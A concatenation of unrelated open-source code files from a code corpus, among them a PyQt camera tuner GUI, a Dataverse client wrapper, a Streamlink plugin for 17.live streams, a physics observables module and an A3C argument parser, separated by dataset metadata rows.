list_s = [s for s in t.split(keyword) if len(s) > 0]
for s in list_s:
list_d = [d.rstrip().lstrip() for d in s.split("(") if len(d) > 0]
list_names.append(list_d[0])
# print ("+++++ function-names :", list_names)
list_names = [name.lower() for name in list_names if len(name) > 0]
return list_names
# ...
# ...
def get_names_module(text_in):
# ... find module names
keyword = "module"
pattern = r"\b" + keyword + r"\b.*"
word_re = re.compile(pattern, re.I)
    text = word_re.findall(text_in.lower())
list_names = []
for t in text:
list_s = [s for s in t.split(keyword) if len(s) > 0]
# print ("++ list_s :", list_s)
for s in list_s:
list_d = [d.rstrip().lstrip() for d in s.split("(") if len(d) > 0]
list_names.append(list_d[0])
set_names = set(list_names)
list_names = list(set_names)
list_names = [name.lower() for name in list_names if len(name) > 0]
# print ("+++++ modules-names :", list_names)
return list_names
# ...
# ...
def get_calls_subroutine(source):
    _re = extract_subroutine_call()
    return _re.findall(source)
# ...
# ...
def get_calls_function(source):
    _re = extract_function_call()
    return _re.findall(source)
# ...
# ...
def extract_subroutine_call():
pattern = r"\bcall\s+(\w+)\("
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def extract_function_call():
pattern = r"\b(\w+)\("
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def extract_contains():
pattern = r"\bcontains\b"
word_re = re.compile(pattern, re.I)
return word_re
# ...
# ...
def get_declarations_calls(source):
text = source
_re = extract_contains()
    condition = (len(_re.findall(text)) > 0)
dict_decl = {}
dict_calls = {}
if condition:
list_code = _re.split(text)
# ... get calls - subroutines
calls_sub = get_calls_subroutine(list_code[0])
# ...
# ... get calls - functions
_calls_fun = get_calls_function(list_code[0])
calls_fun = [s for s in _calls_fun if s not in calls_sub]
# ...
# ... put back the other contains
list_code_new = []
code = list_code[1]
list_code_new.append(r"\tcontains \n")
list_code_new.append(code)
text = ''.join(list_code_new[:])
# ...
# ... get declaration - subroutines
names_sub = get_names_subroutine(text)
# ...
# ... get declaration - functions
names_fun = get_names_function(text)
# ...
# ...
dict_decl["subroutine"] = names_sub
dict_decl["function"] = names_fun
# ...
# ...
dict_calls["subroutine"] = calls_sub
dict_calls["function"] = calls_fun
# ...
else:
# ... get calls - subroutines
calls_sub = get_calls_subroutine(text)
# ...
# ... get calls - functions
_calls_fun = get_calls_function(text)
calls_fun = [s for s in _calls_fun if s not in calls_sub]
# ...
# ...
dict_decl["subroutine"] = []
dict_decl["function"] = []
# ...
# ...
dict_calls["subroutine"] = calls_sub
dict_calls["function"] = calls_fun
# ...
return dict_decl, dict_calls
# ...
# ...
def get_signature_from_text(source):
_re = extract_signature()
m = _re.match(source)
t = m.group(0)
return t
# ...
# ...
def get_arguments_from_text(source):
text = source
try:
        data = extract_arguments().findall(text.lstrip())
arguments = [b.rstrip().lstrip() for b in data if len(b) > 0]
except:
arguments = []
return arguments
# ...
# ...
def get_declarations_variables(source, constructor):
    _source = source.lower()
    list_var = []
    for word in list_keywords_decs:
        # capture an optional "dimension" attribute and the declared names
        pattern = r"[ ]*" + word + r"(.*dimension)?.*::\s*(.+)"
        _re = re.compile(pattern, re.I)
        _vars_name = _re.findall(_source)
        try:
            _vars_arg, _vars_name = zip(*_vars_name)
        except ValueError:
            _vars_name = []
            _vars_arg = None
        if len(_vars_name) > 0:
            for _vars, _args in zip(_vars_name, _vars_arg):
                for var_name in _vars.split(','):
                    args = [s.strip() for s in _args.split(',') if len(s.strip()) > 0]
                    var = constructor(name=var_name.strip(),
                                      dtype=word,
                                      attributs=args)
                    list_var.append(var)
    return list_var
# ...
| mit | -7,290,100,828,926,428,000 | 25.525292 | 78 | 0.511809 | false | 3.169224 | false | false | false |
linyc74/WinduVision | gui/gui_tuner_window.py | 1 | 12150 | import cv2, time, sys, threading, os, json
from PyQt4 import QtCore, QtGui, QtOpenGL
from constants import *
class SliderWidget(QtGui.QWidget):
'''
This widget wraps a single parameter in the TunerWindow.
Name, value, min, max, interval are stored in this object.
Three gui elements are included to display the information of the parameter:
1) QLabel showing name
2) QLabel showing value
3) QSlider
'''
def __init__(self, parent, name, min, max, value, interval):
super(SliderWidget, self).__init__(parent)
self.parent = parent
self.name = name
self.min = min
self.max = max
self.value = value
self.interval = interval
self.QLabel_name = QtGui.QLabel(self) # QLabel showing name
self.QLabel_value = QtGui.QLabel(self) # QLabel showing value
self.QSlider = QtGui.QSlider(QtCore.Qt.Horizontal, self) # QSlider
# Create and set H box layout
self.hbox = QtGui.QHBoxLayout()
self.setLayout(self.hbox)
self.hbox.addWidget(self.QLabel_name)
self.hbox.addWidget(self.QLabel_value)
self.hbox.addWidget(self.QSlider)
self.QLabel_name.setText(name)
self.QLabel_value.setText(str(value))
self.QSlider.setMinimum(min)
self.QSlider.setMaximum(max)
self.QSlider.setValue(value)
self.QSlider.setSingleStep(interval)
self.QSlider.setTickInterval(interval)
self.QSlider.setTickPosition(QtGui.QSlider.TicksBelow)
self.QSlider.sliderReleased.connect(self.slider_released)
def slider_released(self):
'''
User invoked action (mouse release event) => Notify the parent object
'''
value = self.QSlider.value()
# Round the value to fit the interval
value = value - self.min
value = round( value / float(self.interval) ) * self.interval
value = int( value + self.min )
self.value = value
self.QSlider.setValue(value)
self.QLabel_value.setText(str(value))
# Notify the parent that the user changed the value with mouse.
# Let the parent decide what to do with the gui event.
self.parent.user_changed_value(self.name, value)
def set_value(self, value):
'''
Set the value of self.QSlider and self.QLabel_value
Note that this only sets the displayed value without invoking any downstream action
This method is not invoked by user interaction
This method is only for displaying value
'''
if value >= self.min and value <= self.max:
self.value = value
self.QSlider.setValue(value)
self.QLabel_value.setText(str(value))
class TunerWindow(QtGui.QWidget):
'''
A gui template window for tuning parameters.
This class does not contain any business logic.
All it does is to provide an interface to adjust parameters through gui.
Each parameter is wrapped in a 'block' of SliderWidget object.
Properties (name, min, max, value, interval)
of each parameter is stored in the SliderWidget object.
'''
def __init__(self):
super(TunerWindow, self).__init__()
self.vbox = QtGui.QVBoxLayout()
self.setLayout(self.vbox)
self.widgets = {} # a dictionary of widgets, indexed by the name of each parameter
def add_parameter(self, name, min, max, value, interval):
'''
Add a new SliderWidget object holding all information of the new parameter.
'''
widget = SliderWidget(parent = self,
name = name,
min = min,
max = max,
value = value,
interval = interval)
# Add the widget to the dictionary
self.widgets[name] = widget
# Insert the widget to the last row of the V box
self.vbox.insertWidget(len(self.vbox), widget)
def add_widget(self, widget):
'''
Insert QWidget object to the last row of self.vbox (QVBoxLayout)
'''
self.vbox.insertWidget(len(self.vbox), widget)
def set_parameter(self, name, value):
'''
Set the widget slider value
'''
# If the name is not present in self.parameters then do nothing
if self.widgets.get(name, None) is None:
return
self.widgets[name].set_value(value)
def user_changed_value(self, name, value):
'''
To be overridden.
Decides what to do when the child widget slider_released() method is called...
which is invoked upon user mouse action
'''
pass
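
# Minimal usage sketch for TunerWindow (names and values are illustrative):
#
#     window = TunerWindow()
#     window.add_parameter(name='gain', min=0, max=127, value=32, interval=1)
#     window.set_parameter('gain', 64)   # updates the displayed value only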
class CameraTunerWindow(TunerWindow):
'''
Inherits from the TunerWindow class.
    The business logic for the camera imaging parameters is specified in this class.
This class manages the transfer of camera parameters to the core object.
'''
def __init__(self, controller, which_cam, paired, parent):
super(CameraTunerWindow, self).__init__()
self.controller = controller
self.which_cam = which_cam
self.parent = parent
self.setWindowIcon(QtGui.QIcon('icons/windu_vision.png'))
self.setMinimumWidth(600)
title = {CAM_R: 'Right Camera' ,
CAM_L: 'Left Camera' ,
CAM_E: 'Ambient Camera'}
self.setWindowTitle(title[which_cam])
self.__init__load_parameters()
if paired:
# If this CameraTunerWindow object is paired to another camera, e.g. left and right cameras
# then add a check box for toggling the synchronization of the two cameras
self.sync_box = QtGui.QCheckBox(parent=self)
self.sync_box.setText('Sync Control')
self.sync_box.toggled.connect(self.user_changed_sync)
self.add_widget(self.sync_box)
def __init__load_parameters(self):
'''
Load parameters from the .json file, and set the values of the QSliders
'''
filepath = 'parameters/' + self.which_cam + '.json'
with open(filepath, 'r') as fh:
P = json.loads(fh.read())
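        # Example content of parameters/<which_cam>.json (values illustrative;
        # the keys match the sliders created below):
        #   {"brightness": 128, "contrast": 128, "saturation": 128, "gain": 64,
        #    "exposure": -5, "white_balance": 4600, "focus": 30}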
self.add_parameter(name='brightness' , min=0 , max=255 , value=P['brightness' ], interval=5 )
self.add_parameter(name='contrast' , min=0 , max=255 , value=P['contrast' ], interval=5 )
self.add_parameter(name='saturation' , min=0 , max=255 , value=P['saturation' ], interval=5 )
self.add_parameter(name='gain' , min=0 , max=127 , value=P['gain' ], interval=1 )
self.add_parameter(name='exposure' , min=-7 , max=-1 , value=P['exposure' ], interval=1 )
self.add_parameter(name='white_balance' , min=3000, max=6500, value=P['white_balance'], interval=100)
self.add_parameter(name='focus' , min=0 , max=255 , value=P['focus' ], interval=5 )
self.isManual = {}
for name in ['brightness', 'contrast', 'saturation', 'gain', 'exposure', 'white_balance', 'focus']:
self.isManual[name] = True
def user_changed_sync(self):
'''
User (mouse action) check or uncheck the self.sync_box
'''
self.parent.user_changed_sync(self.which_cam, self.sync_box.isChecked())
def set_sync(self, isChecked):
'''
Accessed by external object to set the state of self.sync_box
'''
self.sync_box.setChecked(isChecked)
def user_changed_value(self, name, value):
'''
Called by the child widget method slider_released().
Transfers parameters to the core object via the controller.
'''
self.parent.user_changed_value(self.which_cam, name, value)
self.apply_parameter(name, value)
def apply_parameter(self, name, value):
'''
Apply the camera parameter value to the core object throught the controller
i.e. configuring the camera hardware
'''
# Decides whether or not to apply the parameter to configure the camera hardware
if not self.isManual[name]:
return
data = {'which_cam': self.which_cam,
'parameters': {name: value}}
self.controller.call_method( method_name = 'apply_camera_parameters',
arg = data )
def auto_cam_resumed(self):
'''
Auto camera tuning mainly works on gain and exposure
So set these two parameters to isManual = False...
to prevent user from changing it
'''
for name in ['gain', 'exposure']:
self.isManual[name] = False
def auto_cam_paused(self):
'''
Change gain and exposure back to isManual = True
'''
for name in ['gain', 'exposure']:
self.isManual[name] = True
class CameraTunerWindowSet(object):
'''
This class possesses the three CameraTunerWindow: CAM_R, CAM_L, CAM_E
This class should have the basic methods (interface) that the child CameraTunerWindow has,
e.g. show(), hide(), close() ...
'''
def __init__(self, controller):
# Instantiate three CameraTunerWindow objects
# Collect them in a dictionary
self.windows = {}
self.windows[CAM_R] = CameraTunerWindow(controller, CAM_R, paired=True , parent=self)
self.windows[CAM_L] = CameraTunerWindow(controller, CAM_L, paired=True , parent=self)
self.windows[CAM_E] = CameraTunerWindow(controller, CAM_E, paired=False, parent=self)
self.isSync = False
def show(self):
for i, win in enumerate(self.windows.values()):
win.move(200+200*i, 200)
win.show()
def hide(self):
for win in self.windows.values():
win.hide()
def close(self):
for win in self.windows.values():
win.close()
def set_parameter(self, which_cam, name, value):
self.windows[which_cam].set_parameter(name, value)
def auto_cam_resumed(self):
for win in self.windows.values():
win.auto_cam_resumed()
def auto_cam_paused(self):
for win in self.windows.values():
win.auto_cam_paused()
def user_changed_value(self, which_cam, name, value):
if which_cam == CAM_L and self.isSync:
self.windows[CAM_R].set_parameter(name, value)
self.windows[CAM_R].apply_parameter(name, value)
elif which_cam == CAM_R and self.isSync:
self.windows[CAM_L].set_parameter(name, value)
self.windows[CAM_L].apply_parameter(name, value)
def user_changed_sync(self, which_cam, isChecked):
if which_cam == CAM_L:
self.windows[CAM_R].set_sync(isChecked)
if which_cam == CAM_R:
self.windows[CAM_L].set_sync(isChecked)
self.isSync = isChecked
class DepthTunerWindow(TunerWindow):
'''
Inherits from the TunerWindow class.
    The business logic for the actual depth parameters
    to be tuned is specified in this class.
This class also manages the transfer of depth parameters
to the core object.
'''
def __init__(self, controller):
super(DepthTunerWindow, self).__init__()
self.controller = controller
self.setWindowIcon(QtGui.QIcon('icons/windu_vision.png'))
self.setWindowTitle('Stereo Depth Parameters')
self.setMinimumWidth(600)
self.add_parameter(name='ndisparities', min=0, max=160, value=32, interval=16)
self.add_parameter(name='SADWindowSize', min=5, max=105, value=31, interval=2)
    def user_changed_value(self, name, value):
        '''
        Transfers parameters to the core object via the controller.
        '''
        parms = {}
        for widget in self.widgets.values():
            parms[widget.name] = widget.value
self.controller.call_method( method_name = 'apply_depth_parameters',
arg = parms )
| mit | 1,961,563,425,208,689,200 | 34.217391 | 109 | 0.601646 | false | 3.998026 | false | false | false |
ecreall/nova-ideo | novaideo/views/amendment_management/submit.py | 1 | 7416 | # Copyright (c) 2014 by Ecreall under licence AGPL terms
# available on http://www.gnu.org/licenses/agpl.html
# licence: AGPL
# author: Amen Souissi
import colander
import deform
from pyramid.view import view_config
from pyramid.threadlocal import get_current_registry
import html_diff_wrapper
from dace.processinstance.core import DEFAULTMAPPING_ACTIONS_VIEWS
from pontus.form import FormView
from pontus.view_operation import MultipleView
from pontus.schema import Schema, omit
from pontus.view import BasicView
from pontus.default_behavior import Cancel
from pontus.widget import TextInputWidget
from novaideo.content.processes.amendment_management.behaviors import (
SubmitAmendment)
from novaideo.content.amendment import Amendment, Intention
from novaideo.widget import (
DragDropSelect2Widget,
DragDropSequenceWidget,
DragDropMappingWidget,
LimitedTextAreaWidget)
from novaideo import _
from novaideo.utilities.amendment_viewer import IAmendmentViewer
def get_default_explanations_groups(context):
explanations = dict(context.explanations)
groups = []
grouped_explanations = []
for explanation in explanations.values():
if not(explanation['oid'] in grouped_explanations):
group = [e for e in explanations.values()
if Intention.eq(explanation['intention'], e['intention'])]
grouped_explanations.extend([e['oid'] for e in group])
groups.append(group)
if len(grouped_explanations) == len(explanations):
break
return groups
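
# Note (illustrative example): improvements whose intentions compare equal via
# Intention.eq -- say, several edits made with the same stated intention --
# land in the same group and therefore become a single amendment by default.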
@colander.deferred
def explanations_choice(node, kw):
context = node.bindings['context']
values = [(i['oid'], i['oid']) for i in context.explanations.values()]
return DragDropSelect2Widget(values=values,
item_css_class="col-md-4",
multiple=True)
class ExplanationGroupSchema(Schema):
title = colander.SchemaNode(
colander.String(),
missing="",
widget=TextInputWidget(css_class="title-select-item",
item_css_class="col-md-4",
readonly=True)
)
explanations = colander.SchemaNode(
colander.Set(),
widget=explanations_choice,
missing=[],
default=[],
title=_('Improvements'),
)
justification = colander.SchemaNode(
colander.String(),
widget=LimitedTextAreaWidget(limit=350,
css_class="justification-select-item",
item_css_class="col-md-4",
placeholder=_("Justification")),
missing="",
title=_("Justification")
)
@colander.deferred
def groups_widget(node, kw):
context = node.bindings['context']
return DragDropSequenceWidget(
item_css_class="explanation-groups",
item_title_template=context.title+'-',
node_description=_("To do so, you can drag-and-drop your improvements "
"from one amendment to the other, add amendments or "
"suppress the empty ones."),
max_len=len(context.explanations))
class ExplanationGroupsSchema(Schema):
groups = colander.SchemaNode(
colander.Sequence(),
omit(ExplanationGroupSchema(name='Amendment',
widget=DragDropMappingWidget()),
['_csrf_token_']),
widget=groups_widget,
title=_('Group your improvements into amendments')
)
single_amendment = colander.SchemaNode(
colander.Boolean(),
widget=deform.widget.CheckboxWidget(css_class="single-amendment-control"),
label=_('Group the improvements into a single amendment'),
title='',
missing=False
)
justification = colander.SchemaNode(
colander.String(),
widget=LimitedTextAreaWidget(limit=350,
item_css_class="justification-amendment hide-bloc",
placeholder=_("Justification")),
missing="",
title=_("Justification")
)
class SubmitAmendmentViewStudyReport(BasicView):
title = _('Alert for publication')
name = 'alertforpublication'
template = 'novaideo:views/amendment_management/templates/alert_amendment_submit.pt'
readonly_explanation_template = 'novaideo:views/amendment_management/templates/readonly/submit_explanation_item.pt'
def update(self):
result = {}
amendment_viewer = get_current_registry().getUtility(
IAmendmentViewer,
'amendment_viewer')
souptextdiff, explanations = amendment_viewer.get_explanation_diff(
self.context, self.request)
amendment_viewer.add_details(explanations,
self.context,
self.request,
souptextdiff,
self.readonly_explanation_template)
text_diff = html_diff_wrapper.soup_to_text(souptextdiff)
not_published_ideas = []
if not self.request.moderate_ideas:
not_published_ideas = [i for i in self.context.get_used_ideas()
if 'published' not in i.state]
values = {'context': self.context,
'explanationtext': text_diff,
'not_published_ideas': not_published_ideas}
body = self.content(args=values, template=self.template)['body']
item = self.adapt_item(body, self.viewid)
result['coordinates'] = {self.coordinates: [item]}
return result
class SubmitAmendmentView(FormView):
title = _('Submit')
name = 'submitamendmentform'
formid = 'formsubmitamendment'
schema = ExplanationGroupsSchema()
behaviors = [SubmitAmendment, Cancel]
validate_behaviors = False
css_class = 'panel-transparent'
def default_data(self):
groups = get_default_explanations_groups(self.context)
data = {'groups': []}
i = 1
for group in groups:
justification = ''.join(list(set([e['intention']['comment'] for e in group])))
group_data = {'title': self.context.title +'-'+str(i),
'explanations': [str(e['oid']) for e in group],
'justification': justification}
data['groups'].append(group_data)
i += 1
return data
@view_config(
name='submitamendment',
context=Amendment,
renderer='pontus:templates/views_templates/grid.pt',
)
class SubmitAmendmentViewMultipleView(MultipleView):
title = _('Prepare amendments')
name = 'submitamendment'
viewid = 'submitamendment'
template = 'daceui:templates/mergedmultipleview.pt'
views = (SubmitAmendmentViewStudyReport, SubmitAmendmentView)
behaviors = [SubmitAmendment]
validators = [SubmitAmendment.get_validator()]
requirements = {'css_links': ['novaideo:static/css/organize_amendments.css'],
'js_links': ['novaideo:static/js/organize_amendments.js',
'novaideo:static/js/jquery.elastic.source.js']}
css_class = 'panel-transparent'
DEFAULTMAPPING_ACTIONS_VIEWS.update(
{SubmitAmendment: SubmitAmendmentViewMultipleView})
| agpl-3.0 | -2,999,962,509,159,644,700 | 35.17561 | 119 | 0.618528 | false | 4.094975 | false | false | false |
jbernhard/qm2017 | qm/model.py | 1 | 6803 | """ model output """
import logging
from pathlib import Path
import pickle
from hic import flow
import numpy as np
from sklearn.externals import joblib
from . import workdir, cachedir, systems, expt
from .design import Design
# TODO move this symmetric cumulant code to hic
def csq(x):
"""
Return the absolute square |x|^2 of a complex array.
"""
return (x*x.conj()).real
def corr2(Qn, M):
"""
Compute the two-particle correlation <v_n^2>.
"""
return (csq(Qn) - M).sum() / (M*(M - 1)).sum()
def symmetric_cumulant(events, m, n):
"""
Compute the symmetric cumulant SC(m, n).
"""
M = np.asarray(events['M'], dtype=float)
Q = dict(enumerate(events['Qn'].T, start=1))
cm2n2 = (
csq(Q[m]) * csq(Q[n])
- 2*(Q[m+n] * Q[m].conj() * Q[n].conj()).real
- 2*(Q[m] * Q[m-n].conj() * Q[n].conj()).real
+ csq(Q[m+n]) + csq(Q[m-n])
- (M - 4)*(csq(Q[m]) + csq(Q[n]))
+ M*(M - 6)
).sum() / (M*(M - 1)*(M - 2)*(M - 3)).sum()
cm2 = corr2(Q[m], M)
cn2 = corr2(Q[n], M)
return cm2n2 - cm2*cn2
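
# In terms of flow coefficients, the quantity computed above is
#   SC(m, n) = <v_m^2 v_n^2> - <v_m^2> <v_n^2>,
# so, for example, symmetric_cumulant(events, 4, 2) yields SC(4, 2).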
# fully specify numeric data types, including endianness and size, to
# ensure consistency across all machines
float_t = '<f8'
int_t = '<i8'
complex_t = '<c16'
class ModelData:
"""
Helper class for event-by-event model data. Reads binary data files and
computes centrality-binned observables.
"""
dtype = np.dtype([
('initial_entropy', float_t),
('mult_factor', float_t),
('nsamples', int_t),
('dNch_deta', float_t),
('dN_dy', [(s, float_t) for s in ['pion', 'kaon', 'proton']]),
('mean_pT', [(s, float_t) for s in ['pion', 'kaon', 'proton']]),
('M', int_t),
('Qn', complex_t, 6),
])
def __init__(self, *files):
# read each file using the above dtype and treat each as a minimum-bias
# event sample
def load_events(f):
logging.debug('loading %s', f)
d = np.fromfile(str(f), dtype=self.dtype)
d.sort(order='dNch_deta')
return d
self.events = [load_events(f) for f in files]
def observables_like(self, data, *keys):
"""
Compute the same centrality-binned observables as contained in `data`
with the same nested dict structure.
This function calls itself recursively, each time prepending to `keys`.
"""
try:
x = data['x']
cent = data['cent']
except KeyError:
return {
k: self.observables_like(v, k, *keys)
for k, v in data.items()
}
def _compute_bin():
"""
Choose a function to compute the current observable for a single
centrality bin.
"""
obs_stack = list(keys)
obs = obs_stack.pop()
if obs == 'dNch_deta':
return lambda events: events[obs].mean()
if obs == 'dN_dy':
species = obs_stack.pop()
return lambda events: events[obs][species].mean()
if obs == 'mean_pT':
species = obs_stack.pop()
return lambda events: np.average(
events[obs][species],
weights=events['dN_dy'][species]
)
if obs.startswith('vn'):
n = obs_stack.pop()
k = 4 if obs == 'vn4' else 2
return lambda events: flow.Cumulant(
events['M'], *events['Qn'].T[1:]
).flow(n, k, imaginary='zero')
if obs.startswith('sc'):
mn = obs_stack.pop()
return lambda events: symmetric_cumulant(events, *mn)
compute_bin = _compute_bin()
def compute_all_bins(events):
n = events.size
bins = [
events[int((1 - b/100)*n):int((1 - a/100)*n)]
for a, b in cent
]
return list(map(compute_bin, bins))
return dict(
x=x, cent=cent,
Y=np.array(list(map(compute_all_bins, self.events))).squeeze()
)
def observables(system, map_point=False):
"""
Compute model observables for the given system to match the corresponding
experimental data.
"""
if map_point:
files = [Path('map', system)]
cachefile = Path(system + '_map')
else:
# expected filenames for each design point
files = [Path(system, p) for p in Design(system).points]
cachefile = Path(system)
files = [workdir / 'model_output' / f.with_suffix('.dat') for f in files]
cachefile = cachedir / 'model' / cachefile.with_suffix('.pkl')
if cachefile.exists():
# use the cache unless any of the model data files are newer
# this DOES NOT check any other logical dependencies, e.g. the
# experimental data
# to force recomputation, delete the cache file
mtime = cachefile.stat().st_mtime
if all(f.stat().st_mtime < mtime for f in files):
logging.debug('loading observables cache file %s', cachefile)
return joblib.load(cachefile)
else:
logging.debug('cache file %s is older than event data', cachefile)
else:
logging.debug('cache file %s does not exist', cachefile)
logging.info(
'loading %s%s event data and computing observables',
system,
'_map' if map_point else ''
)
data = expt.data[system]
# identified particle data are not yet available for PbPb5020
# create dummy entries for these observables so that they are computed for
# the model
if system == 'PbPb5020':
data = dict(
((obs, expt.data['PbPb2760'][obs])
for obs in ['dN_dy', 'mean_pT']),
**data
)
# also compute "extra" data for the MAP point
if map_point:
data = dict(expt.extra_data[system], **data)
# flow correlations and central flow not yet available for PbPb5020
if system == 'PbPb5020':
data = dict(
((obs, expt.extra_data['PbPb2760'][obs])
for obs in ['sc', 'sc_central', 'vn_central']),
**data
)
data = ModelData(*files).observables_like(data)
logging.info('writing cache file %s', cachefile)
cachefile.parent.mkdir(exist_ok=True)
joblib.dump(data, cachefile, protocol=pickle.HIGHEST_PROTOCOL)
return data
data = {s: observables(s) for s in systems}
map_data = {s: observables(s, map_point=True) for s in systems}
if __name__ == '__main__':
from pprint import pprint
print('design:')
pprint(data)
print('map:')
pprint(map_data)
| mit | -6,326,045,663,442,107,000 | 27.584034 | 79 | 0.541232 | false | 3.576761 | false | false | false |
himanshuo/osf.io | website/addons/dataverse/client.py | 3 | 2660 | import httplib as http
from dataverse import Connection
from framework.exceptions import HTTPError
from website.addons.dataverse import settings
def connect(username, password, host=settings.HOST):
connection = Connection(
username=username,
password=password,
host=host,
disable_ssl=not settings.VERIFY_SSL,
)
return connection if connection.connected else None
def connect_from_settings(user_settings):
return connect(
user_settings.dataverse_username,
user_settings.dataverse_password
) if user_settings else None
def connect_or_403(username, password, host=settings.HOST):
connection = Connection(
username=username,
password=password,
host=host,
disable_ssl=not settings.VERIFY_SSL,
)
if connection.status == http.FORBIDDEN:
raise HTTPError(http.FORBIDDEN)
return connection if connection.connected else None
def connect_from_settings_or_403(user_settings):
return connect_or_403(
user_settings.dataverse_username,
user_settings.dataverse_password
) if user_settings else None
def delete_file(file):
study = file.study
study.delete_file(file)
def upload_file(study, filename, content):
study.upload_file(filename, content)
def get_file(study, filename, released=False):
return study.get_file(filename, released)
def get_file_by_id(study, file_id, released=False):
return study.get_file_by_id(file_id, released)
def get_files(study, released=False):
return study.get_files(released)
def release_study(study):
return study.release()
def get_studies(dataverse):
if dataverse is None:
return [], []
accessible_studies = []
bad_studies = [] # Currently none, but we may filter some out
for s in dataverse.get_studies():
accessible_studies.append(s)
return accessible_studies, bad_studies
def get_study(dataverse, hdl):
if dataverse is None:
return
study = dataverse.get_study_by_doi(hdl)
try:
if study.get_state() == 'DEACCESSIONED':
raise HTTPError(http.GONE)
return study
except UnicodeDecodeError:
raise HTTPError(http.NOT_ACCEPTABLE)
def get_dataverses(connection):
if connection is None:
return []
dataverses = connection.get_dataverses()
released_dataverses = [d for d in dataverses if d.is_released]
return released_dataverses
def get_dataverse(connection, alias):
if connection is None:
return
dataverse = connection.get_dataverse(alias)
return dataverse if dataverse and dataverse.is_released else None
| apache-2.0 | -7,594,533,291,548,695,000 | 24.825243 | 69 | 0.692481 | false | 3.8 | false | false | false |
melmorabity/streamlink | src/streamlink/plugins/app17.py | 5 | 1780 | import re
from streamlink.plugin import Plugin
from streamlink.plugin.api import useragents
from streamlink.stream import HLSStream, RTMPStream, HTTPStream
API_URL = "https://api-dsa.17app.co/api/v1/liveStreams/getLiveStreamInfo"
_url_re = re.compile(r"https://17.live/live/(?P<channel>[^/&?]+)")
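# The API payload embeds JSON inside a JSON-encoded string, so quotes in it
# are backslash-escaped -- hence the \\" sequences in the patterns below.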
_status_re = re.compile(r'\\"closeBy\\":\\"\\"')
_rtmp_re = re.compile(r'\\"url\\"\s*:\s*\\"(.+?)\\"')
class App17(Plugin):
@classmethod
def can_handle_url(cls, url):
return _url_re.match(url)
def _get_streams(self):
match = _url_re.match(self.url)
channel = match.group("channel")
self.session.http.headers.update({'User-Agent': useragents.CHROME})
payload = '{"liveStreamID": "%s"}' % (channel)
res = self.session.http.post(API_URL, data=payload)
status = _status_re.search(res.text)
if not status:
self.logger.info("Stream currently unavailable.")
return
        url_match = _rtmp_re.search(res.text)
        if not url_match:
            # Guard against API responses that carry no stream URL.
            self.logger.error("Could not extract the stream URL.")
            return
        http_url = url_match.group(1)
http_url = http_url.replace("http:", "https:")
yield "live", HTTPStream(self.session, http_url)
if 'pull-rtmp' in http_url:
url = http_url.replace("https:", "rtmp:").replace(".flv", "")
stream = RTMPStream(self.session, {
"rtmp": url,
"live": True
})
yield "live", stream
if 'wansu-' in http_url:
url = http_url.replace(".flv", "/playlist.m3u8")
for stream in HLSStream.parse_variant_playlist(self.session, url).items():
yield stream
else:
url = http_url.replace("live-hdl", "live-hls").replace(".flv", ".m3u8")
yield "live", HLSStream(self.session, url)
__plugin__ = App17
| bsd-2-clause | 3,212,339,349,401,970,700 | 32.584906 | 86 | 0.57809 | false | 3.390476 | false | false | false |
woonsangcho/a3c | argparser.py | 1 | 4230 |
import argparse
import ast
import os
class ArgParser():
def __init__(self):
self.parser = argparse.ArgumentParser(description=None)
self._add_arguments()
def parse_args(self):
return self.parser.parse_args()
def _add_arguments(self):
self.parser.add_argument("--hostname", type=str, default="localhost", help="Hostname")
self.parser.add_argument("--st-port-num", type=int, default=2222, help="Starting port number for processes")
self.parser.add_argument("--job-name", type=str, default="worker", help="'One of ps' or 'worker'")
self.parser.add_argument("--task-index", type=int, default=0, help="Task index within a job")
self.parser.add_argument("--ps-hosts-num", type=int, default=1, help="The Number of Parameter Servers")
self.parser.add_argument("--worker-hosts-num", type=int, default=1, help="The Number of Workers")
self.parser.add_argument('--algo-name', default="a3c", help='Name of algorithm. For list, see README')
self.parser.add_argument('--log-dir', default=os.getcwd() + "/tmp", help='Log directory path')
self.parser.add_argument('--env-id', default="PongNoFrameskip-v4", help='Environment id')
self.parser.add_argument('--max-bootstrap-length', default=20, type=int, help='Max length of trajectory \
before bootstrapping')
self.parser.add_argument('--max-master-time-step', default=999999999999999, type=int,
help='Max number of time steps to train')
self.parser.add_argument('--max-clock-limit', default=0, type=float, help='Max clock limit to train')
self.parser.add_argument('--anneal-learning-rate', action='store_true',
help='Flag to whether to anneal learning rate or not')
self.parser.add_argument('--anneal-by-clock', action='store_true', help='Flag to anneal learning rate by clock time')
self.parser.add_argument('--use-gpu', action='store_true', help='Flag to use gpu')
def conv_layer_type(inpt):
            try:
                # Parse the literal safely instead of using eval().
                return ast.literal_eval(inpt)
            except (ValueError, SyntaxError):
raise argparse.ArgumentTypeError("Type in a list of 3-valued tuples e.g. [(16, 8, 4), (32, 4, 2)]\
where first value: # of filters, second value: 1-dim size of squared filter, \
third value: stride value")
self.parser.add_argument('--convs', nargs='*', default=[(32, 8, 4), (64, 4, 2), (64, 3, 1)], #(32, 8, 4), (64, 4, 2), (64, 3, 1) (16, 8, 4), (32, 4, 2)
help="Convolutional layer specification", type=conv_layer_type)
self.parser.add_argument('--hiddens', nargs='*', type=int, default=[512], # 256
help="Hidden layer specification: Type in a list of integers e.g. [256 256] where each element\
denotes the hidden layer node sizes in order given")
self.parser.add_argument('--replay-buffer-size', default=1000000, type=int, help='Replay memory size')
self.parser.add_argument('--exploration-fraction', default=0.1, type=float,
help='Exploration fraction, after which final eps is used')
self.parser.add_argument('--exploration-final-eps', default=0.05, type=float,
                                 help='Exploration final eps after exploration fraction * max time step.')
self.parser.add_argument('--replay-start-size', default=50000, type=int,
help='random policy timesteps before actual learning begins')
self.parser.add_argument('--train-update-freq', default=5, type=int,
help='number of actions between successive SGD updates') #4
self.parser.add_argument('--minibatch-size', default=32, type=int, help='minibatch size for SGD')
self.parser.add_argument('--target-network-update-freq', default=10000, type=int,
help='target network update freq to stabilize learning')
| mit | 6,432,203,380,480,910,000 | 69.5 | 161 | 0.591017 | false | 4.071222 | false | false | false |
pqtoan/mathics | mathics/builtin/importexport.py | 3 | 33728 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Importing and Exporting
"""
from __future__ import unicode_literals
from __future__ import absolute_import
import six
from mathics.core.expression import Expression, from_python, strip_context
from mathics.builtin.base import Builtin, Predefined, Symbol, String
from mathics.builtin.options import options_to_rules
from .pymimesniffer import magic
import mimetypes
import sys
from itertools import chain
import urllib
try:
import urllib.request as urllib2
from urllib.error import HTTPError, URLError
except ImportError:
import urllib2
